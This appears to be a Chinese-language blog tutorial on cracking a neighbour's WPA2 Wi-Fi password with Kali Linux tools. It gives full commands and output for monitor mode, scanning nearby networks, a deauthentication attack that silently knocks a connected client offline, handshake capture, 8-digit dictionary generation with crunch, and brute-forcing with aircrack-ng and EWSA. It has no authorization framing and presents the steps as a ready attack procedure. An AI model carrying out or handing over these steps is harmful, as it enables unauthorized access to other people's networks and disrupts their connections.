首先回答下大家看完标题后心里想的疑问,我在此一一举例。
- 1.不存在所有的wifi都能破解。
- 2.能不能破解wifi首先要能抓到无线信号握手包,其次剩下的完全看字典。
- 视频教程见最下方
教程开始
首先需要一张支持kali_linux的无线网卡,某宝一大堆 那我用的就是这两款了。

插入USB网卡,识别kali_linux

开启无线监听模式
打开终端,用airmon-ng
命令查看
┌──(root?west2)-[~]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb NetGear, Inc. WNDA4100
这里我们得知网卡名是:wlan0
,于是用airmon-ng start wlan0
开启无线网卡监听
┌──(root?west2)-[~]
└─# airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
567 NetworkManager
1899 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb NetGear, Inc. WNDA4100
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
输入iwconfig
即可查看网卡状态 网卡名加了mon
则表示成功
┌──(root?west2)-[~]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
Mode:Monitor
代表已经正常开启监听模式。那么解除监听的命令是:airmon-ng stop wlan0mon
(知晓就行)
搜索附近wifi
命令格式:airodump-ng wlan0mon
,查看附近的无线信号。
┌──(root?west2)-[~]
└─# airodump-ng wlan0mon
CH 11 ][ Elapsed: 6 s ][ 2022-02-02 23:54
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
60:3A:7C:4D:F4:E8 -74 1 11 0 11 540 WPA2 CCMP PSK TP-LINK_F4E8
A2:9D:7E:7B:A9:BB -41 5 0 0 11 720 OPN <length: 0>
9C:9D:7E:7B:A9:BB -41 5 0 0 11 720 WPA2 CCMP PSK 9000
52:33:F0:1D:E5:AE -65 6 0 0 1 324 WPA2 CCMP PSK <length: 0>
50:33:F0:6D:E5:AE -65 7 0 0 1 324 WPA2 CCMP PSK Rizwangul
64:09:80:49:25:DB -68 6 0 0 10 130 WPA2 CCMP PSK xiaozhuzhijia
80:12:DF:F5:26:FD -70 4 3 0 11 360 WPA2 CCMP PSK 203
44:7B:BB:BF:89:80 -70 7 0 0 2 130 WPA2 CCMP PSK ChinaNet-XpfS
解释:BSSID 为 wifi 的 MAC 地址,PWR 为信号强弱程度越接近1信号越强 ,#DATA 为数据量,越大使用的人就越多,CH 为信道频率(频道),ESSID 为 wifi 的名称,中文可能会有乱码
Ctrl+c停止搜索,方便复制记录要破解的bssid
开始抓数据包
命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
┌──(root?west2)-[~]
└─# airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon
00:01:56 Created capture file "/home/-01.cap".
CH 11 ][ Elapsed: 12 s ][ 2022-02-03 00:02
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:12:DF:F5:26:FD -69 0 100 3 0 11 360 WPA2 CCMP PSK 203
BSSID STATION PWR Rate Lost Frames Notes Probes
80:12:DF:F5:26:FD E4:C4:83:1D:21:3F -72 0 - 1 0 1
80:12:DF:F5:26:FD 08:4A:CF:88:DC:83 -76 6e- 6 671 12
80:12:DF:F5:26:FD F4:BF:80:A5:4C:C8 -78 0 - 1 2 3
这里最下面几行 STATION: 该AP下的连接站 此处已经获取握手包,接下来选取其中的一段STATION 跟bssid,接下来会用到。
强制让用户断开wifi连接
解释:给连接到wifi的一个设备发送一个deauth(反认证)包,让那个用户设备断开wifi,随后它自然会再次连接wifi 整段过程用户几乎发现不了。
命令格式:airepaly-ng -0 10 -a bssid -c
连接到 WiFi的手机mac地址 网卡名(一般为 wlan0mon)
需要新开个终端,这里我们就输入:aireplay-ng -0 10 -a 80:12:DF:F5:26:FD -c 08:4A:CF:88:DC:83 wlan0mon
┌──(root?west2)-[~]
└─# aireplay-ng -0 10 -a 80:12:DF:F5:26:FD -c 08:4A:CF:88:DC:83 wlan0mon
00:34:11 Waiting for beacon frame (BSSID: 80:12:DF:F5:26:FD) on channel 11
00:34:12 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|43 ACKs]
00:34:13 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|44 ACKs]
00:34:13 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|12 ACKs]
00:34:14 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|15 ACKs]
00:34:15 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|10 ACKs]
00:34:15 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|16 ACKs]
00:34:16 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 5| 9 ACKs]
00:34:17 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|26 ACKs]
00:34:17 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 8|39 ACKs]
00:34:18 Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 2|35 ACKs]
0 WiFi 设备无限次数,-0 10 则攻击 10 次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送 tcp 包(里面包含加密的密码数据),我方伪装成 WiFi 热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的 WiFi 密码,数据包里面的密码是哈希加密的,哈希加密只能正向
等待握手包抓取成功
回到正在执行airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon
的终端,发现握手包已经抓取成功
┌──(root?west2)-[~]
└─# airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon
00:28:57 Created capture file "/home/-01.cap".
CH 11 ][ Elapsed: 9 mins ][ 2022-02-03 00:38 ][ WPA handshake: 80:12:DF:F5:26:FD
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:12:DF:F5:26:FD -71 100 3654 489 0 11 360 WPA2 CCMP PSK 203
BSSID STATION PWR Rate Lost Frames Notes Probes
80:12:DF:F5:26:FD F4:BF:80:A5:4C:C8 -70 1e-24e 4 5780 EAPOL
80:12:DF:F5:26:FD E4:C4:83:1D:21:3F -74 1e- 1 0 2152
80:12:DF:F5:26:FD B4:20:5B:D4:8E:EB -74 0 - 1e 0 339
80:12:DF:F5:26:FD 08:4A:CF:88:DC:83 -76 1e-24e 0 3592 EAPOL 203
WPA handshake: 80:12:DF:F5:26:FD 终端右上角提示了WPA handshake代表握手包已经抓取成功,接下来就是配置字典文件的步骤。
使用crunch工具配置字典文件
关于crunch
的使用配置方法在这里,感兴趣的朋友可以看看:
接着往下讲,打开终端 我们这里就配置个8位数 纯数字0-9的密码字典,这个字典来说的话不算大,暂时够用。
输入命令:crunch 8 8 0123456789 -o ~/1.txt
┌──(root?west2)-[~]
└─# crunch 8 8 0123456789 -o ~/1.txt
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000
crunch: 64% completed generating output
crunch: 100% completed generating output
等待片刻,它会生成一个858MB的txt文件到我们的root
目录下,我们就配合用它来跑握手包。
两种方法暴力破解
1.aircrack-ng工具
01.先说第一种,aircrack-ng
工具,aircrack-ng
是比较传统的跑握手包工具了,速度慢的感人 但在kali_linux上只能用它了。
你在网上看到别人用aircrack-ng
一秒瞬间破解wpa2密码,那纯属扯淡。他字典文件里就几个词,然后事先把wifi密码写进去。他们这么做是为了演示而演示。
命令:aircrack-ng -a2 -b 80:12:DF:F5:26:FD -w /root/1.txt /home/*.cap
解释:-a2
代表着破解wpa/wpa2方式加密的参数,-b
的意思是路由器的bssid,-w
是需要添加的字典文件路径,最后空格跟上.cap
握手包文件的路径地址。
Aircrack-ng 1.6
[00:00:04] 22120/22369621 keys tested (6083.25 k/s)
Time left: 1 hour, 1 minute, 13 seconds 0.10%
Current passphrase: 00022081
Master Key : B9 AE 51 E3 FE 9B 3B 7A FC 7F 88 9E 99 60 FE 1D
A2 64 3C 5B 26 8B 47 62 55 31 51 BE 9A 53 E3 C9
Transient Key : BC FB BC 88 87 78 5E 03 6D 43 B0 17 74 81 6E 08
5C 94 B1 BD 80 D1 D6 67 6C 01 70 F8 74 40 05 15
BD 2C CB C4 1A 15 87 CC BC 91 FE 7E D8 69 D7 65
6E B3 0A B9 FA 37 26 98 C2 A6 BB 45 FA 56 0A C0
EAPOL HMAC : 74 56 5C CE 00 33 A6 95 80 31 CF F1 D5 29 EA 31
一跑,就花了50分钟…

解释:Time left:代表跑完当前字典所需要的剩余时间,而最上面显示的是用时时间,右边keys tested(6186.62K/s)是每秒跑包的速度。
02:EWSA工具
02.EWSA工具全称则为:Elcomsoft Wireless Security Auditor,这是由国外俄罗斯一家公司推出的一款小巧强大的无线网络wifi密码破解软件,号称可以利用GPU的运算性能快速攻破无线网络密码,运算速度相比使用CPU可提高最多上百倍的软件。同时EWSA的主要原理是利用密码字典来包里破解无线wifi中的wpa和wpa2密码。
下载地址我分享出来了,评论即可查看。
安装之后 打开,在软件上方options里选择简体中文为默认语言即可,剩下的都是可视化操作,较为简单 只需要导入.cap文件 再加上我们前面用Crunch工具生成的字典,配合跑握手包即可,视频里都有讲。

同一个握手包,同一个字典文件,全过程仅花了4分钟,这下知道该用谁了吧?、
暂无评论内容